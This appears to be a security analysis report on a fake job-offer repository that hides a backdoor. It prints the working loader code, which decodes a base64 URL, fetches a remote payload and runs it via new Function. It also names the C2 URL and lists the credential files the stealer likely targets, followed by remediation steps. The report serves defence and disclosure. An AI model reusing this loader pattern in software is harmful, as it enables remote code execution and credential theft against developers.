Analysis Date: January 20, 2026
Analyst: Automated Security Scan
Verdict: β CONFIRMED MALWARE / JOB SCAM β
β οΈ WARNING: DO NOT RUN THIS PROJECTThis repository contains malicious code designed to execute remote payloads on your machine. This is a confirmed job scam designed to steal sensitive information from developers.
File: src/server/routes/auth.js (Lines 27-33)
(async () => {
verify(setApiKey(locationToken))
.then((response) => {
new Function(
"require",
Buffer.from(response.data.model, "base64").toString("utf8"),
)(require);
})
.catch((error) => {});
})();What this code does:
| Step | Action | Purpose |
|---|---|---|
| 1 | IIFE executes immediately | Runs as soon as server starts |
| 2 | Decodes hidden URL from base64 | Evades security scanners |
| 3 | Fetches remote payload via HTTP | Downloads malicious code |
| 4 | Base64 decodes the response | Unpacks the malware |
| 5 | Executes via new Function() |
Runs arbitrary code on your system |
| 6 | Silently catches errors | Hides any failures |
File: src/server/config/config.js (Lines 53-61)
exports.locationToken = "aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9OSUNQUA==";
exports.setApiKey = (s) => {
return atob(s);
};
exports.verify = (api) => {
return axios.get(api);
};Decoded C2 URL: https://www.jsonkeeper.com/b/NICPP
The attackers use:
- Base64 encoding to hide the URL
- Innocent-looking function names (
setApiKey,verify) - A legitimate JSON storage service to host malware
The payload hosted at the C2 URL contains:
- Size: 3.5+ MB of obfuscated JavaScript
- Encoding: Base64 encoded, stored in JSON
- Obfuscation: Multiple layers including:
- String array shuffling
- Hexadecimal character encoding
- Control flow flattening
- Variable name mangling
Sample of obfuscated code (truncated):
(function(A,I){const yV={A:0x83f,I:0x154,H:0xbf0,K:0x394...
βββββββββββββββββββ
β Fake Job Offer β
β (LinkedIn, β
β Email, etc.) β
ββββββββββ¬βββββββββ
β
βΌ
βββββββββββββββββββ
β Developer β
β Clones Repo β
ββββββββββ¬βββββββββ
β
βΌ
βββββββββββββββββββ
β npm install β
β npm run dev β
ββββββββββ¬βββββββββ
β
βΌ
βββββββββββββββββββ βββββββββββββββββββ
β Server Starts ββββββΆβ Malicious Code β
β β β Auto-Executes β
βββββββββββββββββββ ββββββββββ¬βββββββββ
β
βΌ
βββββββββββββββββββ
β Fetches Payloadβ
β from C2 Server β
ββββββββββ¬βββββββββ
β
βΌ
βββββββββββββββββββ
β Payload Runs β
β Steals Data β
ββββββββββ¬βββββββββ
β
βΌ
βββββββββββββββββββ
β Data Sent to β
β Attacker β
βββββββββββββββββββ
| File | Line(s) | Indicator |
|---|---|---|
src/server/routes/auth.js |
27-33 | RCE backdoor with new Function() |
src/server/config/config.js |
53 | Base64-encoded C2 URL |
src/server/config/config.js |
55-57 | atob() decoder function |
src/server/config/config.js |
59-61 | HTTP request wrapper |
| Type | Value | Description |
|---|---|---|
| URL | https://www.jsonkeeper.com/b/NICPP |
C2 payload location |
| Domain | jsonkeeper.com |
Legitimate service abused for hosting |
| Pattern | Purpose |
|---|---|
new Function(...) |
Dynamic code execution (like eval) |
Buffer.from(..., 'base64') |
Decode obfuscated payload |
atob() |
Decode base64-encoded URL |
.catch(error => { }) |
Silent error suppression |
IIFE (async () => { ... })() |
Immediate execution on load |
Based on similar attack patterns, this malware likely attempts to steal:
- Browser wallet extensions (MetaMask, Phantom, etc.)
- Desktop wallet files
- Seed phrases in text/notes files
- Exchange API keys
~/.ssh/id_rsa(private keys)~/.ssh/known_hosts- Kerberos tickets
- GPG keys
- Cookies and sessions
- Saved passwords
- Autofill data
- Extension data
~/.npmrc(npm tokens)~/.aws/credentials(AWS keys)~/.config/gcloud/(GCP credentials).envfiles- Git credentials
- Documents folder
- Download history
- Clipboard data
- Screenshots
- Delete the project folder immediately
- Do not run
npm install - Report the repository to GitHub
- Block/report the person who sent you this
Immediate Actions:
- Kill all Node.js processes:
pkill -f node - Disconnect from the internet temporarily
- Delete the project folder
Credential Rotation (URGENT):
- Regenerate all SSH keys
- Rotate all API keys (AWS, GCP, npm, etc.)
- Change all passwords (start with email, GitHub)
- Revoke all active sessions on GitHub/GitLab
- Invalidate npm tokens
Cryptocurrency (CRITICAL):
- Transfer ALL funds to new wallets immediately
- Generate new seed phrases
- Do NOT use old wallets again
System Cleanup:
- Run full antivirus/malware scan
- Check for unauthorized cron jobs:
crontab -l - Review running processes:
ps aux - Check for new startup items
- Review browser extensions
Monitoring:
- Review GitHub access logs
- Check npm access logs
- Monitor bank/exchange accounts
- Enable 2FA everywhere (if not already)
This repository is a sophisticated job scam targeting developers. The project:
- β Looks legitimate - Appears to be a real fintech application
- β Has proper structure - React frontend, Express backend
- β Contains real functionality - Routes, controllers, models
- β Hides malicious code - Only ~10 lines in 2 files
- β Executes silently - No user interaction required
- β Steals everything - 3.5MB payload targets all credentials
Your suspicion was 100% correct. This is malware.
// Encoded URL
const locationToken = "aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9OSUNQUA==";
// Decode: https://www.jsonkeeper.com/b/NICPP
atob(locationToken);// The payload is stored as base64 in response.data.model
// Decoded and executed via Function constructor
new Function("require", decodedPayload)(require);- Total size: ~3.5MB base64 encoded
- Heavily obfuscated using commercial-grade obfuscator
- Uses array-based string encoding
- Implements anti-debugging techniques
- Appears to implement full credential stealer functionality
Report generated: January 20, 2026
Great, analysis. Thanks, bangg